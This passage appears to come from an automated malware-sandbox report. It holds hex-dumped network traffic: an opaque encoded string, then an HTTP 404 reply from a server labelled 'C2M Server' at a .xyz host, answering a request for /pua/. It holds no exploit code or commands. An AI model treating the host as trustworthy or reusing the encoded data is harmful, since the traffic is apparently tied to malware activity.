4b 4f 59 4e 30 63 6b 37 59 6a 41 54 59 5a 6f 4a 2d 32 64 4e 39 52 73 47 79 53 36 36 46 53 30 62 38 53 73 72 5a 77 6a 6f 73 67 79 41 42 30 31 37 37 78 6c 41 4f 39 46 61 33 67 63 42 35 69 52 28 2d 57 64 6a 50 67 64 73 30 78 67 76 7a 75 58 43 70 62 59 44 61 71 44 4e 37 57 72 48 41 79 71 61 47 69 62 44 74 57 58 65 4c 4d 52 44 6e 37 39 64 5f 57 74 71 73 44 62 4a 41 54 4d 6a 33 59 53 4b 65 64 36 46 69 74 50 41 41 6a 53 38 58 6d 34 53 37 28 6f 46 43 78 6a 30 54 68 50 6c 76 39 44 74 62 49 36 66 71 78 41 6a 4c 28 62 7e 69 43 2d 28 5f 43 79 35 32 42 45 44 62 35 63 39 70 7a 72 66 7a 4c 31 47 7a 30 67 45 65 73 62 53 51 52 7a 70 72 56 5f 6d 4a 59 63 38 4d 31 7a 75 44 69 68 75 41 31 4f 71 59 54 48 68 6b 69 55 6b 77 33 6e 6a 6b 44 47 57 46 6f 35 45 67
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 285Accept-Ranges: bytesDate: Tue, 22 Sep 2020 13:54:26 GMTX-Varnish: 168141746Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 75 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 37 38 35 30 30 39 30 37 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /pua/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.78500907.xyz Port 8080</address></body></html>